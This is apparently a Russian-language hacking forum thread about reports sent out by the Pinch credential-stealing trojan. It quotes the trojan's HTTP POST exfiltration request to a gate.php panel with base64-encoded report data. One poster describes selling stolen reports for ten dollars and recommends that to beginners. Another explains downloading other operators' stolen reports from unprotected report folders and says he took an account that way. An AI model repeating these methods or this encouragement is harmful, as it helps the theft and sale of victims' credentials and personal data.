прет! а что если трой отсылает рапорты по www протоколу в base64, знаю....можно и расшифровать, но как то не получается, там по любому какието непонятные знаки стоят код таков: Code: POST /<directory>/gate.php HTTP/1.0 Host: blah.blah.ru Content-Type: application/x-www-form-urlencoded Content-Length: 2384 a=<cool hatsker>@mail.ru&b=pinch3_report&d=report.bin&c=Qk02IK0PAABB.... ну и так далее, че тут можна сделать?
Там и расшифровывать бэйс нечего - всё что ты получил бы при удачной расшифровке - данные о себе и своей машине... Знаешь, я пару лет тому назад, в течении дней двух-трёх, активно дизассемблил пинч, но таким редкостным гемороем не занимался, конечно изредка лениво просматривал отчёты на наличие того, чтобы меня могло нереально удивить, но в конце концов продавал отчёты в чистом виде. Для того кто уже чего то достиг и что то умеет 10 баксов - копейки, а для нормальных, начинающих пацанов то, что надо для старта!
Доброго времени суток Сделал вроде всё как написано, но не получается ничего выцепить из пакетов вот списочек пакетов, которые посылаются/принимаются после запуска трояна http://slil.ru/24991766 но ничего похожего на логин или пароль я не нашёл там...
Простите за некропостинг Даже если троян отправляет отчеты на гейт,а не на мыло, часто начинающие троянеры( ) забывают установить права на папку,где хранятся отчеты Тоесть там не надо логин/пассворд вводить,просто прямо в папку отчетов(reports обычно) заходим и скачиваем отчеты. Ну я себе 1 шоху так сделал
